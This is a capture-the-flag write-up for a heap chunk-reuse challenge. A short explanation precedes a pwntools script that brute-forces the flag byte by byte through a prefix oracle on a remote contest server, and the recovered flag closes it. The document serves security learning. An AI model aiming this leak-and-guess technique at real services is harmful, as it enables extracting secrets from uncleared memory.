Rating:
Solution:
"chunk-reuse-leak"
`fgets` fills a heap chunk with the flag as part of `read_flag`, and that chunk is not cleared. So the next `malloc` can hand the same chunk back, and by carefully clobbering the existing flag bytes we can obtain a character-by-character leak.
```
import string
import pwn
import time
import warnings
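warnings.filterwarnings(action='ignore', category=BytesWarning)

elf = pwn.ELF("./chal")
pwn.context.binary = elf
# pwn.context.log_level = "DEBUG"
pwn.context(terminal=['tmux', 'split-window', '-h'])
libc = elf.libc

# p = elf.process()
# p = pwn.remote("0.cloud.chals.io", 25330)

# Start
# Root cause (see writeup above): the chunk that fgets filled in read_flag
# is handed back by the next malloc without being cleared, so the service
# acts as a prefix oracle -- it answers "Almost" when the guessed prefix is
# right.  Each round of the loop below extends the known prefix by one byte.
CANDIDATES = string.ascii_letters + string.digits + "_}"

flag = "TBTL{"
while flag[-1] != "}":
    for c in CANDIDATES:
        # One fresh connection per guess: the process answers once and exits.
        p = pwn.remote("0.cloud.chals.io", 25330)
        guess = flag + c
        print(guess)
        try:
            # Send bytes explicitly instead of relying on pwntools' str->bytes
            # coercion (which is what the BytesWarning filter above hides).
            p.sendlineafter(b"guess:", b"64")
            p.sendlineafter(b"guess", guess.encode())
            response = p.recvall().decode()
        finally:
            # The original closed the socket only on the miss path; a hit
            # `break`-ed past p.close() and left the connection dangling.
            p.close()
        if "Almost" in response:
            flag += c
            print(flag)
            break
    else:
        # No candidate extended the prefix: bail out instead of re-trying the
        # same prefix forever (the original would loop indefinitely here).
        raise SystemExit(f"no candidate extended prefix {flag!r}")
    print(flag)
    # Pause between rounds so we do not hammer the service.
    time.sleep(2)
# TBTL{50m371m35_y0u_d0_1nd33d_937_1ucky_4321092833}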
```